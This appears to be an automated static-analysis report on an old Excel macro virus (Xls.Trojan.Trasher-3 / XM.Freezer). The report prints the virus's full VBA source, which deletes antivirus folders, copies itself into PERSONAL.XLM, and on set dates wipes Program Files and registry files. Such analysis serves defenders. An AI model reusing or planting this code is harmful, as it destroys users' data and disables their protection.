Xls.Trojan.Trasher-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ada7eb288c5511c1…

MALICIOUS

Office (OLE)

Size: 22.0 KB
Created: 1998-02-12 17:58:36
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 35a6f3124b51e45c953be5598492e57e
SHA-1: 160f268e2840b8e4a4b62907008ad830d32bd835
SHA-256: ada7eb288c5511c125fa90d023287458c659184d6dba7acc7177d2e5928b6959
Risk score: 320

Malware Insights

Xls.Trojan.Trasher-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Excel file containing VBA macros. The Auto_Open macro attempts to disable antivirus software by deleting files from known AV installation directories and removes macro menu items. The `Shell()` call and the `Auto_Open` and `Auto_Close` macros indicate an attempt to execute arbitrary commands and potentially install persistence or download further payloads.

Heuristics (6)

  • ClamAV: Xls.Trojan.Trasher-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Trasher-3
  • VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2451 bytes
SHA-256: 26eef91e9f6cc772cb633fd69a452b8650309ce302ff5aa58f44c56eeb9eac55
Detection: ClamAV: Xls.Trojan.Trasher-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet3"

'********************************
'* Name    : XM.Freezer         *
'* Created : February 5, 1998   *
'* Author  : ULTRAS             *
'********************************
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Call Auto_Close
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Joke
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
ULTRAS = 0
Freezer = 0
Application.ScreenUpdating = False
For b = 1 To Application.Workbooks.Count
If Application.Workbooks(b).Name = "PERSONAL.XLM" Then
ULTRAS = 1
For u = 1 To Application.Workbooks("PERSONAL.XLM").Modules.Count
If Application.Workbooks("PERSONAL.XLM").Modules(u).Name = "Sheet3" Then
Freezer = 1
End If
Next
If Freezer = 0 Then
Windows("PERSONAL.XLM").Visible = True
Application.Workbooks("Freezer.XLM").Modules("Sheet3").Copy after:=Application.Workbooks("PERSONAL.XLM").Modules(1)
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
End If
Next
If ULTRAS = 0 Then
newname$ = ActiveWorkbook.Name
Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\PERSONAL.XLM"
Application.Workbooks.Open (Application.StartupPath + "\PERSONAL.XLM")
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
Application.ScreenUpdating = True
End Sub

Sub Joke()
Attribute Joke.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo HaHaHa
If Day(Now()) = 14 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 16, "ULTRAS"
Shell ("Deltree  /y C:\Progra~1")
End If
If Day(Now()) = 28 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 48, "ULTRAS"
SetAttr "c:\windows\user.dat", 0
SetAttr "c:\windows\user.da0", 0
Kill "c:\windows\user.dat"
Kill "c:\windows\user.da0"
End If
HaHaHa:
End Sub